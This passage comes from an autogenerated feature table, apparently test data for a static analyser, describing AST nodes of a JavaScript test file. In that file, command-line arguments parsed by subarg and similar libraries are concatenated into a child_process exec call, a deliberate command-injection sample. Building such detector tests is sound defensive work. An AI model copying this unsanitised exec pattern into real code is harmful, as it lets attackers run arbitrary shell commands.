autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg ... ubarg') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg ... ubarg') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg ... ubarg') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg ... ubarg') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:6:81:31 | subarg ... ubarg') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:21 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:21 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:21 | require | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:21 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:21 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | exceptional return of require('subarg') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | exceptional return of require('subarg') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | exceptional return of require('subarg') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | exceptional return of require('subarg') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | exceptional return of require('subarg') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:23:81:30 | 'subarg' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:3 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:8 | cp.exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | exceptional return of cp.exec ... )).foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | exceptional return of cp.exec ... )).foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | exceptional return of cp.exec ... )).foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | exceptional return of cp.exec ... )).foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | exceptional return of cp.exec ... )).foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:5:82:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:5:82:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:5:82:8 | exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:5:82:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:5:82:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- subarg().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:27 | subarg | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:27 | subarg | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:27 | subarg | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:27 | subarg | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:27 | subarg | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | exceptional return of subarg( ... ice(2)) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | exceptional return of subarg( ... ice(2)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | exceptional return of subarg( ... ice(2)) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | exceptional return of subarg( ... ice(2)) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | exceptional return of subarg( ... ice(2)) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:54 | subarg( ... 2)).foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:35 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:35 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:35 | process | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:35 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:35 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:40 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:40 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:40 | process.argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:40 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:40 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:46 | process.argv.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:46 | process.argv.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:46 | process.argv.slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:46 | process.argv.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:46 | process.argv.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | exceptional return of process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | exceptional return of process ... lice(2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | exceptional return of process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | exceptional return of process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | exceptional return of process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | CalleeFlexibleAccessPath | subarg | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | calleeImports | subarg | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:37:82:40 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:37:82:40 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:37:82:40 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:37:82:40 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:37:82:40 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:42:82:46 | slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:42:82:46 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:42:82:46 | slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:42:82:46 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:42:82:46 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | CalleeFlexibleAccessPath | process.argv.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:48:82:48 | 2 | InputArgumentIndex | 0 | +| 